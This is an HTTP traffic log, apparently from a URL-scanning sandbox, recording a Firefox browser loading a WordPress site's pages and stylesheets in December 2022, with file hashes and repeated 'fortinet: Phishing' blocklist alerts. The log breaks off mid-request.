Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
x-amz-id-2: BvXeh6lOQLrIWBevc/RpyMagNcVE1CvjxzuvTOFaqddZMxx6w1Htfi5v9IgMjzO1IFeDNVg4T20=
x-amz-request-id: XTV8XAP8ZFY709EY
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Sun, 04 Dec 2022 13:47:00 GMT
age: 336
last-modified: Thu, 10 Nov 2022 09:21:27 GMT
etag: "9ebddc2b260d081ebbefee47c037cb28"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    9ebddc2b260d081ebbefee47c037cb28
Sha1:   492bad62a7ca6a74738921ef5ae6f0be5edebf39
Sha256: 74bbb7cba16f7d084a08a0907d47d7496e5c148f904707ec6950f8f6a61027e5
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Sun, 04 Dec 2022 13:52:36 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.102.187.140
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-origin: *
access-control-expose-headers: Last-Modified, Retry-After, Cache-Control, Content-Type, Pragma, Backoff, ETag, Expires, Content-Length, Alert
content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-length: 329
via: 1.1 google
date: Sun, 04 Dec 2022 13:08:58 GMT
cache-control: public,max-age=3600
age: 2618
last-modified: Fri, 25 Mar 2022 17:45:46 GMT
etag: "1648230346554"
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         172.64.155.188
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sun, 04 Dec 2022 13:52:37 GMT
Content-Length: 471
Connection: keep-alive
Last-Modified: Thu, 01 Dec 2022 05:26:22 GMT
Expires: Thu, 08 Dec 2022 05:26:21 GMT
Etag: "3098dbc7a62ab2193afb2a74abdcae610ed11358"
Cache-Control: max-age=314624,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb4
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 774506064f7bb4f7-OSL

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 3639
Cache-Control: max-age=159293
Date: Sun, 04 Dec 2022 13:52:37 GMT
Etag: "638c632b-1d7"
Expires: Tue, 06 Dec 2022 10:07:30 GMT
Last-Modified: Sun, 04 Dec 2022 09:06:51 GMT
Server: ECS (ska/F71C)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: WX4btGd/MhSxM0MKjeT2zw==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

search
                                         54.186.169.128
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: lvKjrjT3jnwdc6iWem1t9m8qTTk=

                                        
                                            GET /ajax/libs/slick-carousel/1.8.1/slick.min.css?ver=6.1.1 HTTP/1.1 
Host: cdnjs.cloudflare.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         104.17.25.14
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
date: Sun, 04 Dec 2022 13:52:37 GMT
content-length: 394
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb03fd5-559"
last-modified: Mon, 04 May 2020 16:16:21 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 15602385
expires: Fri, 24 Nov 2023 13:52:37 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mkRQRP7H15S9DtA1G3KvJbrZADVZ2qs94zc0pK29zsQ%2BVCWFgH4tmxORi%2FAgy8DygFDjkzLcrlsKpeAl60%2BScs7p%2BZBD%2Bubj1LFGWukZNdcMaf2JEj0W2aASF9W62XmM8vQBs7zE"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 7745060b0b460b45-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1327)
Size:   394
Md5:    50d05d35119a9bd8cf777402bb4789a0
Sha1:   fd03f42f191f21580b72dc3e474e9b7503a82555
Sha256: a8daf82dae80ef2b347046c449acf73de160cc273a70cb74ed4cb71597a69bfc
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sun, 04 Dec 2022 13:52:37 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET / HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
x-powered-by: PHP/7.4.33
set-cookie: vchideactivationmsg_vc11=12.0; secure
link: <https://triumphinvestigativeservicesllc.com/wp-json/>; rel="https://api.w.org/", <https://triumphinvestigativeservicesllc.com/wp-json/wp/v2/pages/549>; rel="alternate"; type="application/json", <https://triumphinvestigativeservicesllc.com/>; rel=shortlink
content-encoding: br
vary: Accept-Encoding
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (9381), with CRLF, LF line terminators
Size:   33486
Md5:    c99d05210107c2a7d7dc810a7922a6b4
Sha1:   cc8f3073457b2c96df2b4a0c8404e068cc1ba91d
Sha256: fb43c18fbe37408729889cd865b82f636fa97a787cfc99f2ce4e6adb450d3991

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sun, 04 Dec 2022 13:52:37 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /wp-includes/css/dashicons.min.css?ver=6.1.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Wed, 03 Mar 2021 21:16:22 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 35110
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (58981)
Size:   35110
Md5:    54c5bfb8a890d87139d9abfe01662c83
Sha1:   f9eddf5b8a3269e6d6fa40b4f13083705e6267c6
Sha256: 9685e5cabe4efc8c85e986725af8009b306416aad3ecc9086ca5bb12b84ce4ef

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/widget-areas/css/widget_areas.css?ver=1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:58:39 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 398
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   398
Md5:    3bb6f24d5cde232ea5bacb387c5d8497
Sha1:   bd3aa5ce595b703ecda7d9de00e384b4f6109bac
Sha256: e20822b8110464fea430b1ef6418376d006c70e5fea54e1cb9071fa41f31c78d

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/the-guard/css/alicoBold.css?ver=6.1.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:55:42 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 769
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   769
Md5:    26f917a5deccf1531b346579d31797bf
Sha1:   499f6fb6557272361624aedaa0bfb5e310ad8792
Sha256: 0eecdeec7d37c03115739205d244519682e921837f38def185245abdb7009d93

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/the-guard/css/security.css?ver=6.1.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:55:42 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 914
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   914
Md5:    dbd96baac7504fbb1b6a4a371d8732a5
Sha1:   ec734d0dc841648f5a44fa05316af532e831ea02
Sha256: edfa0fab19c5509790dde6c4da6c19c925aab2f81d58a071df1bf6a52999ee3d
                                        
                                            GET /wp-content/themes/the-guard/css/dynamic.css?ver=6.1.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Mon, 10 Jan 2022 20:58:29 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 45122
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (573), with CRLF line terminators
Size:   45122
Md5:    85f5f25b2408a8d15da2eb58795c9e50
Sha1:   de7dfda6a38f98793d8a14e6754f35717973857a
Sha256: 48dbb40e79bb54b0b887151e99c6d4951c4a45e58af755eb9689233874dd89d7

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/the-guard/css/font-awesome.min.css?ver=6.1.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:55:42 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 5881
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (27303), with CRLF line terminators
Size:   5881
Md5:    3b79bb5d0d459d64902a51f4df5a0ab4
Sha1:   68dc515f97caa7971d7a0e5155a80e9ad3c3cb49
Sha256: af3dd89879ebc5fdd6c89730239f7e120958df1743cf030c2f11dcbc5779d238

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/the-guard/style.css?ver=6.1.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 27 Jan 2022 17:59:39 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 277
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   277
Md5:    01309bf1cf9303197bc9a0e9b30b0141
Sha1:   d3fce63a1924b2533fca7d0694562b7297ec9f4c
Sha256: 0945d9633719c3c3efdd917a564d718796b50d9548c4cf66c955219bb726989c

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-includes/css/dist/block-library/style.min.css?ver=6.1.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Wed, 16 Nov 2022 06:53:52 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 11616
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (47826)
Size:   11616
Md5:    c4d7cc056b49b00e05cc29cc59aa3d5a
Sha1:   48c426bec60099d2a8628df430ed682c72aab42a
Sha256: 8009c12f2674a8d38401f4b5faad1fef2cfcd18a8c927ed2561ae9d7de9b57b5

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors-style.css?ver=5.9.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 10 Mar 2022 20:02:47 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 1207
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (5305), with no line terminators
Size:   1207
Md5:    8869d434cd2a3350017c5dddb6b6c624
Sha1:   218f6b304da36e0e5c1212e2b8afd934f2801a93
Sha256: 80727ae14af6bf4636a9455f87ce0e83429bacb577965aee4d0ce980759bf7e9
                                        
                                            GET /wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style.css?ver=5.9.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 10 Mar 2022 20:02:47 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 19387
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (65527), with no line terminators
Size:   19387
Md5:    f1d5e220cfbd09e06b389c10979694e3
Sha1:   da093396b6e2edd29850a89d064fa1dbe81de37a
Sha256: 7c9fcb7425f600f500db87902ebccc00e0f4b2f918a801b3c39cb416628d64bf

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Fri, 04 Nov 2022 04:57:03 GMT
accept-ranges: bytes
content-length: 217
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   217
Md5:    95e891f28e44a9b314c09545d86be2b7
Sha1:   f9b13a8bd47273b086a0a07df15f314e0af0bc3e
Sha256: 5a5f39391fbf5b06db84b8f9716d53de575ee97a627d2c5f12f79a991a671eb5
                                        
                                            GET /wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.4.5 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 18:57:21 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 41475
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65536), with no line terminators
Size:   41475
Md5:    9bd9929677372c465402cd09cde550fc
Sha1:   f133e6a51598db35af53c8f36cb78cea42bda800
Sha256: da693db958dd537bcb1d8002ac63f9e357b587c8218f2d849ab559938074d8e8

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.1 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.27
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Thu, 14 Oct 2021 19:13:56 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 848
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   848
Md5:    c962ba8e7d42ff9da18392b41dad5151
Sha1:   7b89bc5e6ad161df2e6d7f7fb3ad894aa04b827f
Sha256: 322a4949c5bdd82eb80c13bbbd407ce30a7ad226685c54270d246cb6960e524e

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/responsive-lightbox/assets/swipebox/swipebox.min.css?ver=2.3.3 HTTP/1.1 
Host: triumphinvestigativeservicesllc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
